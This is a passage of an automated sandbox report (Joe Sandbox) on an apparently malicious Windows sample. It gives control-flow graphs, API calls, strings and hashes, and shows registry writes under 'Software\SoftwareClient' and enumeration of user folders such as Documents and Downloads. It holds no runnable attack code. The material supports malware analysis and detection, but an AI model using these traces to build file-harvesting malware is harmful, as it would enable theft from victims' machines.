                                                                                                      • Instruction Fuzzy Hash: A751DFB1E046489FDB25DFA5D848BEFBFF4AF14304F04121AE412B2290D7B5A988CB91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1421 e37860-e3792e RegCreateKeyExW call e31560 call e45980 call e4a270 call e4aa90 RegSetValueExW call e31560 RegCloseKey 1432 e37930-e3793c 1421->1432 1433 e37958-e37972 call e8d512 1421->1433 1434 e3794e-e37955 call e8d9bb 1432->1434 1435 e3793e-e3794c 1432->1435 1434->1433 1435->1434 1437 e37973-e3798b call e9c3be 1435->1437 1443 e37990-e37994 1437->1443 1444 e379b7-e379c2 1443->1444 1445 e37996-e37998 1443->1445 1446 e3799a-e379a0 1445->1446 1447 e379ac-e379b4 1445->1447 1446->1444 1448 e379a2-e379aa 1446->1448 1448->1443 1448->1447
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.KERNELBASE(80000001,software\SoftwareClient,00000000,00000000,00000000,000F003F,00000000,AB1AAB9C,00000000,AB1AAB9C), ref: 00E378B0
                                                                                                      • RegSetValueExW.KERNELBASE(?,?,00000000,00000003,?,?,?,?,?,?,?,?,000000FF), ref: 00E37901
                                                                                                      • RegCloseKey.KERNELBASE(?,?,?), ref: 00E37922
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateValue
                                                                                                      • String ID: <- :sizeof key$EncodingParameters$Error opening key.$Error writing to Registry.$Success opening key.$Success writing to Registry.$software\SoftwareClient
                                                                                                      • API String ID: 1818849710-1185376041
                                                                                                      • Opcode ID: 05114067f72b0c5be61f8a03edbb5a9d658a15969c9a3402de7237d081d5d4a2
                                                                                                      • Instruction ID: f100c93caebc0274e244dfa65b6196f7e69dff3017858624b3f87412c80b28d4
                                                                                                      • Opcode Fuzzy Hash: 05114067f72b0c5be61f8a03edbb5a9d658a15969c9a3402de7237d081d5d4a2
                                                                                                      • Instruction Fuzzy Hash: 59410471604248ABDB249F34DC4ABBF7BAADBC1710F105239F955B7381DB72DA04CA51

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1449 e9c660-e9c68e call ea4a6d MultiByteToWideChar 1452 e9c69e-e9c6b3 MultiByteToWideChar 1449->1452 1453 e9c690-e9c69c GetLastError call e9ca07 1449->1453 1452->1453 1454 e9c6b5-e9c6c4 call ea6049 1452->1454 1458 e9c71a-e9c723 1453->1458 1460 e9c714-e9c715 call ea4646 1454->1460 1461 e9c6c6-e9c6e0 MultiByteToWideChar 1454->1461 1460->1458 1462 e9c6e2-e9c6f7 MultiByteToWideChar 1461->1462 1463 e9c707-e9c70e GetLastError call e9ca07 1461->1463 1462->1463 1465 e9c6f9-e9c6fd call ea7031 1462->1465 1468 e9c713 1463->1468 1469 e9c702-e9c705 1465->1469 1468->1460 1469->1468
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00E3D85C,00E3B65C,?), ref: 00E9C681
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?), ref: 00E9C690
                                                                                                      • __dosmaperr.LIBCMT ref: 00E9C697
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?), ref: 00E9C6A8
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,?,?), ref: 00E9C6D8
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,00000000,?,00000000,00000000,?), ref: 00E9C6EF
                                                                                                      • _free.LIBCMT ref: 00E9C715
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$ErrorLast__dosmaperr_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3033228717-0
                                                                                                      • Opcode ID: 0aa0c116286c898ec77240417e7e8b0e33a8b88a9804b0af53e10eefbbb93a91
                                                                                                      • Instruction ID: 3dd408e0f762c8dc4cf3aac9006c0a65efe0a8626203c76c810d3546de823a8c
                                                                                                      • Opcode Fuzzy Hash: 0aa0c116286c898ec77240417e7e8b0e33a8b88a9804b0af53e10eefbbb93a91
                                                                                                      • Instruction Fuzzy Hash: B12181B6501218BFDF21ABF6DC89DBF7BACEB897A0B201115F905E6250DB709D009B70

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1470 e3f810-e3f87d 1471 e3f881-e3f88a 1470->1471 1472 e3f87f 1470->1472 1473 e3f8bc-e3f8c1 1471->1473 1474 e3f88c-e3f893 1471->1474 1472->1471 1475 e3f8c3 1473->1475 1476 e3f8c5-e3f8c8 1473->1476 1477 e3f895-e3f89c 1474->1477 1475->1476 1478 e3f8fa-e3f8ff 1476->1478 1479 e3f8ca-e3f8d1 1476->1479 1480 e3f8b6-e3f8b9 1477->1480 1481 e3f89e-e3f8a4 1477->1481 1483 e3f903-e3f906 1478->1483 1484 e3f901 1478->1484 1482 e3f8d3-e3f8da 1479->1482 1480->1473 1481->1477 1485 e3f8a6-e3f8b1 1481->1485 1486 e3f8f4-e3f8f7 1482->1486 1487 e3f8dc-e3f8e2 1482->1487 1488 e3f938-e3f93d 1483->1488 1489 e3f908-e3f90f 1483->1489 1484->1483 1490 e3f9ac-e3f9b7 SHGetKnownFolderPath 1485->1490 1486->1478 1487->1482 1493 e3f8e4-e3f8ef 1487->1493 1491 e3f941-e3f944 1488->1491 1492 e3f93f 1488->1492 1494 e3f911-e3f918 1489->1494 1495 e3f9e1-e3f9fe call e8d512 1490->1495 1496 e3f9b9-e3f9be 1490->1496 1498 e3f946-e3f94f 1491->1498 1499 e3f974-e3f977 1491->1499 1492->1491 1493->1490 1501 e3f932-e3f935 1494->1501 1502 e3f91a-e3f920 1494->1502 1497 e3f9c0-e3f9c9 1496->1497 1497->1497 1503 e3f9cb-e3f9db call e48340 CoTaskMemFree 1497->1503 1504 e3f950-e3f957 1498->1504 1506 e3f97b-e3f97e 1499->1506 1507 e3f979 1499->1507 1501->1488 1502->1494 1508 e3f922-e3f92d 1502->1508 1503->1495 1510 e3f959-e3f95f 1504->1510 1511 e3f96e-e3f971 1504->1511 1506->1495 1512 e3f980-e3f989 1506->1512 1507->1506 1508->1490 1510->1504 1514 e3f961-e3f96c 1510->1514 1511->1499 1515 e3f990-e3f997 1512->1515 1514->1490 1515->1495 1516 e3f999-e3f99f 1515->1516 1516->1515 1517 e3f9a1-e3f9a7 1516->1517 1517->1490
                                                                                                      APIs
                                                                                                      • SHGetKnownFolderPath.SHELL32(00EBB350,-00000001,-00000001,00000000,AB1AAB9C,?), ref: 00E3F9AC
                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,-00000002), ref: 00E3F9DB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FolderFreeKnownPathTask
                                                                                                      • String ID: Desktop$Documents$Downloads$Pictures$Videos
                                                                                                      • API String ID: 969438705-3807122180
                                                                                                      • Opcode ID: 10393e6b29e9a48a8825ff096d374806bc3fc58946e358ecdcb97057ed0d5486
                                                                                                      • Instruction ID: 19eaf3e507b66de9137d4c41fea345c903a59fa3dc6d70da67d47b3bd2912459
                                                                                                      • Opcode Fuzzy Hash: 10393e6b29e9a48a8825ff096d374806bc3fc58946e358ecdcb97057ed0d5486
                                                                                                      • Instruction Fuzzy Hash: 0451DF76E00105ABCB188F58C948BBBBFB5FF85324F501169E806BB350DB709D81CBA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 0-537541572
                                                                                                      • Opcode ID: 77657e0375ad46538ad05f28a4d0613703ac83dde90b9223dcf7268d70c66c80
                                                                                                      • Instruction ID: a04ee984716fb46409d4dab7f04bea840bff582ff7ae61092fa38b81817e590a
                                                                                                      • Opcode Fuzzy Hash: 77657e0375ad46538ad05f28a4d0613703ac83dde90b9223dcf7268d70c66c80
                                                                                                      • Instruction Fuzzy Hash: 7621FCB2901226ABC7314A29AC45B6B77989FCB764F112120F915BF2D0D7B0FC10C5D0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E322E0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3237F
                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E3B711
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Ios_base_dtor___std_exception_copystd::ios_base::_
                                                                                                      • String ID: (_$0xABADCABA$eof :$|a
                                                                                                      • API String ID: 2061216789-2373377734
                                                                                                      • Opcode ID: 2558b926632f2b44d870daf8deda0cc7327643636fb049c5fc15322095f588a4
                                                                                                      • Instruction ID: df6abf954f6130a09ccde9ec2204b650fa37a0c660bfda4aa6ca7d55b425a215
                                                                                                      • Opcode Fuzzy Hash: 2558b926632f2b44d870daf8deda0cc7327643636fb049c5fc15322095f588a4
                                                                                                      • Instruction Fuzzy Hash: 84F1BF70A00248CFDB10DF68C889B9EBBF5BF44314F5495A9E54ABB292D771EA84CF50
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E334F0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000000,AB1AAB9C), ref: 00E33530
                                                                                                        • Part of subcall function 00E334F0: GetLastError.KERNEL32(?,80000000,AB1AAB9C), ref: 00E3353A
                                                                                                        • Part of subcall function 00E33B20: CreateEventW.KERNEL32 ref: 00E33C0C
                                                                                                        • Part of subcall function 00E33B20: GetLastError.KERNEL32 ref: 00E33C18
                                                                                                        • Part of subcall function 00E33B20: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E33C4D
                                                                                                        • Part of subcall function 00E33B20: GetLastError.KERNEL32 ref: 00E33C5A
                                                                                                        • Part of subcall function 00E33B20: CloseHandle.KERNEL32(00000000), ref: 00E33C65
                                                                                                      • EnterCriticalSection.KERNEL32(009192F0,?,?,?,0000006C,?), ref: 00E3476D
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,0000006C,?), ref: 00E347DA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalErrorLastSection$CreateEvent$CloseCountEnterHandleInitializeLeaveSpin
                                                                                                      • String ID: @a$d$mutex
                                                                                                      • API String ID: 539720752-3305263385
                                                                                                      • Opcode ID: 638def4b05f8d550a94f7b2b3c1c81bda5da0102a8ae5146276a81ed83d12552
                                                                                                      • Instruction ID: 132f846fab1e63ec548efa57f86c8e71b4276fbb25df26861c56cffb93d5a508
                                                                                                      • Opcode Fuzzy Hash: 638def4b05f8d550a94f7b2b3c1c81bda5da0102a8ae5146276a81ed83d12552
                                                                                                      • Instruction Fuzzy Hash: 9171AAB0D043488FDB14DFA5C849BAEBBF4AF58304F14511EE809BB291D7B5AA04CBA0
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(?,?,Function_00068D99,00000000,?,?), ref: 00E98F40
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00E33898,00000000,00000000,00E33940,?,00000000), ref: 00E98F4C
                                                                                                      • __dosmaperr.LIBCMT ref: 00E98F53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                                                      • String ID: @9
                                                                                                      • API String ID: 2744730728-1740763812
                                                                                                      • Opcode ID: 78a3b75134a6c9a8762664ba0221391183817cdbe0b7198c89c9a1ade427e857
                                                                                                      • Instruction ID: a8d9bc84bbd26dff0ea68a35411ea7e8afdea3795065a89b0b56dd97d05552f5
                                                                                                      • Opcode Fuzzy Hash: 78a3b75134a6c9a8762664ba0221391183817cdbe0b7198c89c9a1ade427e857
                                                                                                      • Instruction Fuzzy Hash: E4018C72A1020EEFDF14EFA0DE15AAE7BA9EF02364F106158B805B6160DF758E10DB90
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\SoftwareClient,00000000,00020019,?), ref: 00E3AF6D
                                                                                                      • RegGetValueA.KERNELBASE(?,00ED385B,?,00000008,00000000,?,?), ref: 00E3AF91
                                                                                                      Strings
                                                                                                      • Software\SoftwareClient, xrefs: 00E3AF63
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: OpenValue
                                                                                                      • String ID: Software\SoftwareClient
                                                                                                      • API String ID: 3130442925-1782167085
                                                                                                      • Opcode ID: af0c83991ae14302ead75384626c2014e0a8233a561a227810b26a31c58ce24d
                                                                                                      • Instruction ID: 1182365cbc5e54f00ba8f69a37664e9ab7e07cb520489cc09f322925549344a2
                                                                                                      • Opcode Fuzzy Hash: af0c83991ae14302ead75384626c2014e0a8233a561a227810b26a31c58ce24d
                                                                                                      • Instruction Fuzzy Hash: 8821A275600219AFDB24DF14DC05BFAB7B9EB14304F0441AAF508B7681DBB06B458BA0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00EE40B0,00000010), ref: 00E98DAC
                                                                                                      • ExitThread.KERNEL32 ref: 00E98DB3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID: `F
                                                                                                      • API String ID: 1611280651-2505862506
                                                                                                      • Opcode ID: 5f09e914eb5a1cc2cb7db070c31c2ce3653d1e4abf6cab47892391decb521db9
                                                                                                      • Instruction ID: bbcdbcaeea8f7e1374d74efbad9c46b8c53daa2a8be324e987fe8a35b3e6e4a3
                                                                                                      • Opcode Fuzzy Hash: 5f09e914eb5a1cc2cb7db070c31c2ce3653d1e4abf6cab47892391decb521db9
                                                                                                      • Instruction Fuzzy Hash: AEF0C271600208AFDF10BFB0C94AA6F37B5FF4A700F101149F505BB2A1DBB06900CBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0280b8b9ef7d57693787d65d00bc4111469c38589a5f6e6510c297a3e3fc1d4a
                                                                                                      • Instruction ID: 0b68f2e2eb005005c25530cb4f65af9bfa73ccd21e1be81cb3d3df7e46eebf34
                                                                                                      • Opcode Fuzzy Hash: 0280b8b9ef7d57693787d65d00bc4111469c38589a5f6e6510c297a3e3fc1d4a
                                                                                                      • Instruction Fuzzy Hash: BB61B172E00609AFDF11EBA8C881BEEBBB9EF0E355F146155E405BF191D670AD018B71
                                                                                                      APIs
                                                                                                      • __Xtime_get_ticks.LIBCPMT ref: 00E40D53
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E40DB9
                                                                                                      • __Thrd_sleep.LIBCPMT ref: 00E40DD7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thrd_sleepUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1616912868-0
                                                                                                      • Opcode ID: 2e7020209d905b6d72aa55614ba1044abc8718a75f1df00cfa9cc8017b0e5a77
                                                                                                      • Instruction ID: aaacff9dbfbe5195027937dbd2db8091886f1906cf3981245dc40e31dfce317e
                                                                                                      • Opcode Fuzzy Hash: 2e7020209d905b6d72aa55614ba1044abc8718a75f1df00cfa9cc8017b0e5a77
                                                                                                      • Instruction Fuzzy Hash: D1417371A143049FC714EF68D88192BB7F8AF88754F111A2DF999B7291D770ED08CB92
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,00E34AB8,?,00EA5C1F,00E34AB8,00EE4490,0000000C,00EA5CC7,00000000), ref: 00EA5D3F
                                                                                                      • GetLastError.KERNEL32(?,00EA5C1F,00E34AB8,00EE4490,0000000C,00EA5CC7,00000000), ref: 00EA5D49
                                                                                                      • __dosmaperr.LIBCMT ref: 00EA5D74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2583163307-0
                                                                                                      • Opcode ID: 3de996da3b20f03e2533be8331c0e207f6c777122ccb194715c549ec02462177
                                                                                                      • Instruction ID: 57aa96abefe8c90a85e7cbe84e1eec658b8fbfed39fa3e56d83b1f4e319be89c
                                                                                                      • Opcode Fuzzy Hash: 3de996da3b20f03e2533be8331c0e207f6c777122ccb194715c549ec02462177
                                                                                                      • Instruction Fuzzy Hash: 95010833604A505EC6246274698D77F67898B8B738F391519F816FF1D1DB64BC858250
                                                                                                      APIs
                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,00EA846B,00000000,00000000,00000002,00000000), ref: 00EA83F5
                                                                                                      • GetLastError.KERNEL32(?,00EA846B,00000000,00000000,00000002,00000000,?,00EA5A79,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00EA83FF
                                                                                                      • __dosmaperr.LIBCMT ref: 00EA8406
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
